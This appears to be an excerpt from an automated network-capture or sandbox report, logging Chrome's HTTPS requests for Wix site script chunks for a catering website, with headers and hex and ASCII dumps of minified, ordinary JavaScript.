                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 68 28 28 65 3d 3e 7b 45 2e 70 75 73 68 28 7b 74 61 67 3a 65 2c 65 6d 62 65 64 64 65 64 4e 6f 64 65 73 3a 6e 75 6c 6c 7d 29 7d 29 29 3b 63 6f 6e 73 74 20 65 3d 7b 69 64 3a 61 7d 3b 57 28 41 28 29 2c 65 2c 63 2e 63 6f 6e 66 69 67 2e 65 78 70 65 72 69 6d 65 6e 74 73 7c 7c 7b 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 60 24 7b 65 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 21 31 3b 72 65 74 75 72 6e 20 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 74 7c 7c 28 74 3d 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 65 29 3e 30 29 7d 29 29 2c 74 7c 7c 65 7d 28 21 21 6e 29 3f 65 3a 22 22 7d 2f 24 7b 61 7d 24 7b 74 7d 60 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 5a 28 65
                                                                                                                                                                                                                        Data Ascii: h((e=>{E.push({tag:e,embeddedNodes:null})}));const e={id:a};W(A(),e,c.config.experiments||{})}}function Q(e,t,n){return`${e&&!function(e){let t=!1;return s.forEach((e=>{t||(t=location.hostname.indexOf(e)>0)})),t||e}(!!n)?e:""}/${a}${t}`}async function Z(e
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC966INData Raw: 29 2c 6d 65 74 61 73 69 74 65 49 64 3a 77 69 6e 64 6f 77 2e 77 69 78 45 6d 62 65 64 73 41 50 49 2e 67 65 74 4d 65 74 61 53 69 74 65 49 64 28 29 2c 77 69 78 53 69 74 65 3a 77 69 6e 64 6f 77 2e 77 69 78 45 6d 62 65 64 73 41 50 49 2e 69 73 57 69 78 53 69 74 65 28 29 2c 6c 61 6e 67 75 61 67 65 3a 77 69 6e 64 6f 77 2e 77 69 78 45 6d 62 65 64 73 41 50 49 2e 67 65 74 4c 61 6e 67 75 61 67 65 28 29 2c 63 61 74 65 67 6f 72 69 65 73 3a 74 7d 29 7d 7d 21 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 77 69 78 45 6d 62 65 64 73 41 50 49 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 67 65 74 4c 6f 61 64 65 64
                                                                                                                                                                                                                        Data Ascii: ),metasiteId:window.wixEmbedsAPI.getMetaSiteId(),wixSite:window.wixEmbedsAPI.isWixSite(),language:window.wixEmbedsAPI.getLanguage(),categories:t})}}!function(){const e=window;function t(){const t=e.wixEmbedsAPI;!function(){const t=Object.freeze({getLoaded


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        36192.168.2.54975634.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC626OUTGET /services/wix-thunderbolt/dist/group_3.0be98eee.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 66324
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: Mlr_6xSMJpWMT8TgBNrED_msRll08xxp
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 284973416 263993677
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 413864595
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcydaHuKmePuYLvGovietlnc/MRAhrlVRxaXdYSRy7tLb
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:27 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274151
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:10 GMT
                                                                                                                                                                                                                        ETag: "a8d4910360403854978fa0d4e1719619"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC227INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 36 36 5d 2c 7b 36 32 32 38 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 59 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 6e 28 37 31 37 36 34 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 59 5a 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 68 61 73 68 53 74
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[266],{62289:(e,t,n)=>{"use strict";t.YZ=void 0;var r=n(71764);Object.defineProperty(t,"YZ",{enumerable:!0,get:function(){return r.hashSt
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 72 69 6e 67 7d 7d 29 7d 2c 36 34 38 34 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 68 61 73 68 50 68 6f 6e 65 3d 74 2e 68 61 73 68 45 6d 61 69 6c 3d 74 2e 64 69 67 65 73 74 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 6e 28 35 32 39 32 29 2c 6f 3d 22 40 40 40 77 69 78 2d 44 31 35 42 41 38 46 35 2d 33 30 33 31 2d 34 32 43 41 2d 42 44 34 33 2d 30 42 36 38 46 34 31 38 42 32 46 30 40 40 40 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 72 28 65 2b 6f 29 7d 74 2e 64 69 67 65 73 74 3d 61 2c 74 2e 68 61 73 68 45 6d 61 69 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                        Data Ascii: ring}})},64846:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.hashPhone=t.hashEmail=t.digest=void 0;var r=n(5292),o="@@@wix-D15BA8F5-3031-42CA-BD43-0B68F418B2F0@@@";function a(e){return r(e+o)}t.digest=a,t.hashEmail=function(e){
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 29 7b 72 65 74 75 72 6e 28 30 2c 6f 2e 76 61 6c 69 64 61 74 65 53 74 72 69 6e 67 29 28 65 29 3f 28 30 2c 61 2e 72 65 70 6c 61 63 65 45 6d 61 69 6c 73 29 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 68 61 73 68 45 6d 61 69 6c 29 28 65 29 7d 29 29 3a 65 7d 2c 74 2e 68 61 73 68 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 6f 2e 76 61 6c 69 64 61 74 65 53 74 72 69 6e 67 29 28 65 29 3f 28 30 2c 72 2e 64 69 67 65 73 74 29 28 65 29 3a 65 7d 7d 2c 37 35 38 37 31 3a 28 65 2c 74 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 6c 65 6e 67 74 68 3e 30 7d 4f 62 6a 65
                                                                                                                                                                                                                        Data Ascii: ){return(0,o.validateString)(e)?(0,a.replaceEmails)(e,(function(e){return(0,r.hashEmail)(e)})):e},t.hashString=function(e){return(0,o.validateString)(e)?(0,r.digest)(e):e}},75871:(e,t)=>{"use strict";function n(e){return"string"==typeof e&&e.length>0}Obje
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 52 65 67 45 78 70 28 22 5e 5c 5c 73 2a 22 2b 65 2b 22 3d 5c 5c 73 2a 28 2e 2a 3f 29 5c 5c 73 2a 24 22 29 2c 6e 3d 5b 5d 3b 74 72 79 7b 6e 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 6f 72 28 76 61 72 20 72 3d 30 2c 6f 3d 6e 3b 72 3c 6f 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 61 3d 6f 5b 72 5d 2e 6d 61 74 63 68 28 74 29 3b 69 66 28 61 29 72 65 74 75 72 6e 20 61 5b 31 5d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 2c 74 2e 77 72 69 74 65 43 6f 6f 6b 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 61 3d 65 2b 22 3d 22 2b 74 2b 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 65
                                                                                                                                                                                                                        Data Ascii: =function(e){var t=RegExp("^\\s*"+e+"=\\s*(.*?)\\s*$"),n=[];try{n=window.document.cookie.split(";")}catch(e){}for(var r=0,o=n;r<o.length;r++){var a=o[r].match(t);if(a)return a[1]}return null},t.writeCookie=function(e,t,n,r,o){var a=e+"="+t+"; expires="+ne
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 73 65 74 28 69 29 2c 74 68 69 73 2e 73 65 73 73 69 6f 6e 3d 74 68 69 73 2e 72 65 61 64 53 65 73 73 69 6f 6e 28 72 2c 69 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 74 69 6d 65 6f 75 74 29 2c 63 26 26 28 74 68 69 73 2e 74 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 65 78 74 65 6e 64 28 74 2e 63 72 65 61 74 65 53 65 73 73 69 6f 6e 28 72 29 29 7d 29 2c 63 29 29 2c 69 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 41 6e 64 45 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 3b 76 61 72 20 74 3d 74 68 69 73 2e 72 65 61 64 53 65 73 73 69 6f 6e 28 65 2c 74 68 69 73 2e 63 6f 6f 6b 69 65 2e 67 65 74 28 29 7c 7c 74 68
                                                                                                                                                                                                                        Data Ascii: set(i),this.session=this.readSession(r,i),clearTimeout(this.timeout),c&&(this.timeout=setTimeout((function(){return t.extend(t.createSession(r))}),c)),i},e.prototype.getAndExtend=function(e){void 0===e&&(e=1);var t=this.readSession(e,this.cookie.get()||th
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 29 2c 74 2d 31 65 33 29 29 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 41 6e 64 4e 6f 74 69 66 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 63 69 74 69 76 69 74 79 4c 69 73 74 65 6e 65 72 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 28 29 7d 29 29 2c 74 68 69 73 2e 67 65 74 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 43 6f 6f 6b 69 65 3f 74 68 69 73 2e 63 6f 6e 66 69 67 2e 67 65 74 28 29 7c 7c 74 68 69 73 2e 63 6f 6f 6b 69 65 2e 67 65 74 28 29 3a 74 68 69 73 2e 63 6f 6e 66 69 67 2e 67 65 74 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69
                                                                                                                                                                                                                        Data Ascii: ),t-1e3))}},e.prototype.getAndNotify=function(){return this.acitivityListeners.forEach((function(e){return e()})),this.get()},e.prototype.get=function(){return this.options.enableCookie?this.config.get()||this.cookie.get():this.config.get()},e.prototype.i
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 5b 6e 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 76 61 72 20 72 3d 74 68 69 73 2e 67 65 74 43 6f 6d 6d 6f 6e 43 6f 6e 66 69 67 28 29 3b 72 65 74 75 72 6e 20 72 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 5b 65 5d 26 26 72 5b 65 5d 2e 61 70 70 6c 79 28 72 2c 74 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 50 6f 6c 69 63 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 63 61 6c 6c 28 22 67 65 74 22 2c 22 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 22 29 3b 72 65 74 75 72 6e 20 65 3f 7b 70 6f 6c 69 63 79 3a 65 7d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 67 65 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79
                                                                                                                                                                                                                        Data Ascii: <arguments.length;n++)t[n-1]=arguments[n];var r=this.getCommonConfig();return r&&"function"==typeof r[e]&&r[e].apply(r,t)},e.prototype.getPolicy=function(){var e=this.call("get","consentPolicy");return e?{policy:e}:"function"==typeof this.getConsentPolicy
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 50 6f 6c 69 63 79 28 29 3f 74 68 69 73 2e 67 65 74 43 6f 6f 6b 69 65 52 65 61 64 65 72 57 72 69 74 65 72 28 29 2e 72 65 61 64 28 6f 2e 43 4f 4f 4b 49 45 5f 4e 41 4d 45 29 3a 6e 75 6c 6c 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 74 68 69 73 2e 63 68 65 63 6b 50 6f 6c 69 63 79 28 29 29 72 65 74 75 72 6e 7b 62 73 69 3a 6e 75 6c 6c 2c 74 74 6c 3a 6e 75 6c 6c 7d 3b 76 61 72 20 74 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6e 3d 4d 61 74 68 2e 6d 69 6e 28 74 2b 6f 2e 53 45 53 53 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 2c 73 2e 67 65 74 4e 65 78 74 4c 6f 63 61 6c 4d 69 64 6e 69 67 68 74 28 29 29 2c 72 3d 69 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 43 6f 6f 6b 69 65 52 65 61 64 65 72 57 72 69 74 65 72
                                                                                                                                                                                                                        Data Ascii: Policy()?this.getCookieReaderWriter().read(o.COOKIE_NAME):null},e.prototype.set=function(e){if(!this.checkPolicy())return{bsi:null,ttl:null};var t=Date.now(),n=Math.min(t+o.SESSION_DURATION,s.getNextLocalMidnight()),r=i();return this.getCookieReaderWriter
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 33 32 35 38 34 31 39 34 2c 66 3d 32 37 31 37 33 33 38 37 38 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 3d 31 36 29 72 3d 67 2c 6f 3d 70 2c 73 3d 6d 2c 75 3d 66 2c 67 3d 69 28 67 2c 70 2c 6d 2c 66 2c 65 5b 6e 5d 2c 37 2c 2d 36 38 30 38 37 36 39 33 36 29 2c 66 3d 69 28 66 2c 67 2c 70 2c 6d 2c 65 5b 6e 2b 31 5d 2c 31 32 2c 2d 33 38 39 35 36 34 35 38 36 29 2c 6d 3d 69 28 6d 2c 66 2c 67 2c 70 2c 65 5b 6e 2b 32 5d 2c 31 37 2c 36 30 36 31 30 35 38 31 39 29 2c 70 3d 69 28 70 2c 6d 2c 66 2c 67 2c 65 5b 6e 2b 33 5d 2c 32 32 2c 2d 31 30 34 34 35 32 35 33 33 30 29 2c 67 3d 69 28 67 2c 70 2c 6d 2c 66 2c 65 5b 6e 2b 34 5d 2c 37 2c 2d 31 37 36 34 31 38 38 39 37 29 2c 66 3d 69 28 66 2c 67 2c 70 2c 6d 2c 65 5b 6e 2b 35 5d 2c 31 32 2c 31 32 30 30 30
                                                                                                                                                                                                                        Data Ascii: 32584194,f=271733878;for(n=0;n<e.length;n+=16)r=g,o=p,s=m,u=f,g=i(g,p,m,f,e[n],7,-680876936),f=i(f,g,p,m,e[n+1],12,-389564586),m=i(m,f,g,p,e[n+2],17,606105819),p=i(p,m,f,g,e[n+3],22,-1044525330),g=i(g,p,m,f,e[n+4],7,-176418897),f=i(f,g,p,m,e[n+5],12,12000
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 2b 31 30 5d 2c 32 33 2c 2d 31 30 39 34 37 33 30 36 34 30 29 2c 67 3d 6c 28 67 2c 70 2c 6d 2c 66 2c 65 5b 6e 2b 31 33 5d 2c 34 2c 36 38 31 32 37 39 31 37 34 29 2c 66 3d 6c 28 66 2c 67 2c 70 2c 6d 2c 65 5b 6e 5d 2c 31 31 2c 2d 33 35 38 35 33 37 32 32 32 29 2c 6d 3d 6c 28 6d 2c 66 2c 67 2c 70 2c 65 5b 6e 2b 33 5d 2c 31 36 2c 2d 37 32 32 35 32 31 39 37 39 29 2c 70 3d 6c 28 70 2c 6d 2c 66 2c 67 2c 65 5b 6e 2b 36 5d 2c 32 33 2c 37 36 30 32 39 31 38 39 29 2c 67 3d 6c 28 67 2c 70 2c 6d 2c 66 2c 65 5b 6e 2b 39 5d 2c 34 2c 2d 36 34 30 33 36 34 34 38 37 29 2c 66 3d 6c 28 66 2c 67 2c 70 2c 6d 2c 65 5b 6e 2b 31 32 5d 2c 31 31 2c 2d 34 32 31 38 31 35 38 33 35 29 2c 6d 3d 6c 28 6d 2c 66 2c 67 2c 70 2c 65 5b 6e 2b 31 35 5d 2c 31 36 2c 35 33 30 37 34 32 35 32 30 29 2c 67
                                                                                                                                                                                                                        Data Ascii: +10],23,-1094730640),g=l(g,p,m,f,e[n+13],4,681279174),f=l(f,g,p,m,e[n],11,-358537222),m=l(m,f,g,p,e[n+3],16,-722521979),p=l(p,m,f,g,e[n+6],23,76029189),g=l(g,p,m,f,e[n+9],4,-640364487),f=l(f,g,p,m,e[n+12],11,-421815835),m=l(m,f,g,p,e[n+15],16,530742520),g


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        37192.168.2.54975834.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC635OUTGET /services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1089INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: QtLCJ7A44c5c8tO.g8GNgtOLQWa0dPST
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 927165676 871696694
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Sun, 05 Jan 2025 06:35:59 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 458199
                                                                                                                                                                                                                        Last-Modified: Sun, 05 Jan 2025 06:22:40 GMT
                                                                                                                                                                                                                        ETag: "ea9d97ffd7bbaa28a8c1e36592411af1"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC301INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 32 37 34 2c 36 38 35 30 5d 2c 7b 33 35 32 35 36 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 3b 76 61 72 20 70 3d 6e 28 32 33 31 38 34 29 3b 63 6f 6e 73 74 20 72 3d 74 3d 3e 74 2e 72 65 61 63 74 31 38 43 6f 6d 70 61 74 69 62 6c 65 26 26 21 61 28 29 26 26 22 72 65 61 63 74 2d 6e 61 74 69 76 65 22 21 3d 3d 70 2e 65 6e 76 2e 52 45 4e 44 45 52 45 52 5f 42 55 49 4c 44 2c 61 3d 28 29 3d 3e 7b 74 72 79 7b 72 65 74 75
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[1274,6850],{35256:(t,e,n)=>{n.d(e,{Z:()=>r});var p=n(23184);const r=t=>t.react18Compatible&&!a()&&"react-native"!==p.env.RENDERER_BUILD,a=()=>{try{retu
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC131INData Raw: 7d 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 2f 64 69 73 74 2f 63 6f 6d 70 6f 6e 65 6e 74 73 4c 6f 61 64 65 72 2e 38 61 63 61 64 61 66 32 2e 63 68 75 6e 6b 2e 6d 69 6e 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                        Data Ascii: }}}]);//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js.map


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        38192.168.2.54975734.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC402OUTGET /services/wix-thunderbolt/dist/9839.a6a8764d.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1163INHTTP/1.1 200 OK
